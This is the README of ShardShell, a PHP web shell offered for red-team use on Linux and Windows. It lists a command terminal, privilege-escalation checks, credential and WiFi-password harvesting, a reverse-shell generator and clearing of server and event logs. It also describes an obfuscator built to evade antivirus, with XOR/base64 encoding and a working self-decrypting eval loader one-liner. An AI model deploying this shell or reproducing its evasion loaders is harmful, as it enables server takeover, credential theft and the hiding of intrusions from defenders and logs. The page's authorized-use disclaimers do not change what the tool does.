Authorized use only. ShardShell is a PHP post-exploitation shell for red team engagements with explicit written authorization. Using it against systems you don't own or aren't contracted to test is illegal in most jurisdictions. The authors accept no liability for misuse.
Advanced PHP web shell built for authorized penetration testing and red team engagements. Two versions: Linux and Windows, each tuned with OS-native commands and priv-esc vectors.
| File | Target OS | Notes |
|---|---|---|
shell-linux.php |
Linux / macOS | Uses /proc, find -perm, crontab, ss, etc. |
shell-windows.php |
Windows / IIS | Uses whoami /priv, wmic, schtasks, netstat -ano, registry checks, etc. |
Both versions share the same core framework and UI. OS-specific modules differ as shown:
| Module | Linux | Windows |
|---|---|---|
| Dashboard | System stats, PHP config | Same |
| File Manager | Browse, edit, upload, download, hex view, chmod | Same (minus chmod) |
| Terminal | sh commands, session history |
cmd.exe commands, session history |
| System Recon | /proc, ps aux, cron, /etc/passwd |
systeminfo, tasklist, schtasks, net user, whoami /all |
| Network Tools | Port scan, revshell gen (11 types), dig |
Port scan, revshell gen (11 types incl. PowerShell/mshta), nslookup |
| Database | MySQL, SQLite | MySQL, MSSQL (sqlsrv), SQLite |
| Priv-Esc | SUID/SGID, capabilities, kernel CVEs, sudo, container detection | Token privileges, unquoted service paths, AlwaysInstallElevated, AutoLogon, stored creds, WiFi passwords, AV detection |
| Encoding | Base64, Hex, URL, HTML, ROT13, hashing | Same |
| Stealth | Apache/Nginx/syslog clearing, bash history | Windows Event Log clearing (wevtutil), IIS log clearing, PowerShell history |
Drop the appropriate version into any PHP-enabled web server directory.
# Local test
php -S 0.0.0.0:8888 -t .Default password: admin — change $CONF['passwd'] at the top of the file.
ShardShell ships with a build-time obfuscator that produces hardened, AV-evasive PHP shell variants from clean source. The builder runs as a Python 3 CLI — no PHP runtime needed at build time.
# Build all variants (standard + loader)
./build/build.sh --all
# Build with lint verification (requires podman or php-cli)
./build/build.sh --all --lint
# Custom build
python3 build/obfuscate.py shell-linux.php -o shell-obf.php
python3 build/obfuscate.py shell-linux.php --loader -o shell-enc.php| Level | Techniques |
|---|---|
none |
Comment stripping + minification only |
standard (default) |
Comment stripping, XOR+base64 string encoding, variable renaming, safe minification |
aggressive |
All above + function call indirection |
Wraps the entire obfuscated payload in a self-decrypting loader:
- XOR payload with a 32-byte random key
- GZip compress (level 9)
- Base64 encode
- Ship as
<?php ... @eval("?>".gzinflate(XOR(base64_decode(payload),key))) ?>
The original shell never appears in plaintext — even strings shows nothing recognizable. Loader output is ~37% the size of the original.
| Technique | Effect |
|---|---|
| String encoding | All single-quoted string literals → _sXXXX("base64...") calls, decoded at runtime with embedded XOR key |
| Variable renaming | $command, $result, etc. → random identifiers (superglobals preserved) |
| Comment stripping | Removes //, #, /* */ comments; correctly handles ?> within comments |
| Minification | Collapses PHP whitespace only; HTML/CSS/JS blocks left intact |
| Function indirection (aggressive) | exec() → _f('exec')(), shell_exec() → _f('shell_exec')() via runtime lookup |
| File | Typical Size |
|---|---|
dist/shell-linux-obf.php |
~105 KB |
dist/shell-windows-obf.php |
~110 KB |
dist/shell-linux-loader.php |
~35 KB |
dist/shell-windows-loader.php |
~37 KB |
For bare-metal deployments, wrap with a __halt_compiler() loader:
<?php $f=str_rot13("onfr64_qrpbqr");eval('?>'.$f(substr(file_get_contents(__FILE__),__COMPILER_HALT_OFFSET__+1)));__halt_compiler();
{base64 encoded shell here}This tool is intended exclusively for authorized security assessments and penetration testing under a valid contract or written authorization. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The author assumes no liability for misuse.
MIT - see LICENSE.
| Repo | What it does |
|---|---|
| ShardLure | SSH honeypot + threat-intel dashboard |
| ShardC2 | Red-team C2 framework in Go |
| ShardFlow | Layer-2 LAN workbench (ARP, drop, throttle) |
| ShardShell | PHP post-exploitation shell |
| ShardPass | Minimal TOTP authenticator (Chrome MV3) |
| ShardPet | Pixel-Pokémon browser extension |